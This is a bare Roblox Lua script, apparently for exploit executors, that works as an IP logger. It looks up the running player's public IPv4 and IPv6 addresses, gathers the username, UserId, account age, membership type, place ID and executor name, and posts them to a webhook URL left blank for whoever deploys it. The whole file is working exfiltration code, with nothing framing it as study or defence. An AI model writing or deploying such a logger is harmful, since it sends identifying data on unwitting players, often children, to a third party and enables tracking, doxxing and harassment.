local Webhook = "" -- Enter your webhook here 

local IPv4 = game:HttpGet("https://api.ipify.org") 

local IPv6 = game:HttpGet("https://api64.ipify.org") 

local Headers = {["content-type"] = "application/json"} 



local LocalPlayer = game:GetService("Players").LocalPlayer 



local AccountAge = LocalPlayer.AccountAge 

local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21) 

local UserId = LocalPlayer.UserId

local PlayerName = LocalPlayer.Name 

local PlaceID = game.PlaceId 



local LogTime = os.date('!%Y-%m-%d-%H:%M:%S GMT+0') 

local rver = "Version 0.1b"





function identifyexploit()

   local ieSuccess, ieResult = pcall(identifyexecutor)

   if ieSuccess then return ieResult end

   

   return (SENTINEL_LOADED and "Sentinel") or (XPROTECT and "SirHurt") or (PROTOSMASHER_LOADED and "Protosmasher")

end



local PlayerData =

{

       ["content"] = "",

       ["embeds"] = {{

           ["title"] = "TITE | IPS", 

           ["description"] = rver, 

           ["fields"] = {

               {

                   

                   ["name"] = "Username:",

                   ["value"] = PlayerName,

                   ["inline"] = true

               },

               {

                  

                   ["name"] = "Membership Type:",

                   ["value"] = MembershipType,

                   ["inline"] = true

               },

               {

                   

                   ["name"] = "Account Age (days):",

                   ["value"] = AccountAge,

                   ["inline"] = true

               },

               {

                  

                   ["name"] = "UserId:",

                   ["value"] = UserId,

                   ["inline"] = true

               },

               {

                   

                   ["name"] = "IPv4:",

                   ["value"] = IPv4,

                   ["inline"] = true

               },

               {

                   

                   ["name"] = "IPv6:",

                   ["value"] = IPv6,

                   ["inline"] = true

               },

               {

                  

                   ["name"] = "Place ID: ",

                   ["value"] = PlaceID,

                   ["inline"] = true

               },

               {

                   

                   ["name"] = "Executor: ",

                   ["value"] = identifyexploit(),

                   ["inline"] = true

               },

               {

                   

                   ["name"] = "Log Time:",

                   ["value"] = LogTime,

                   ["inline"] = true

               },

           },

       }}

   }





local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)

local HttpRequest = http_request;



if syn then

   HttpRequest = syn.request

   else

   HttpRequest = http_request

end





HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
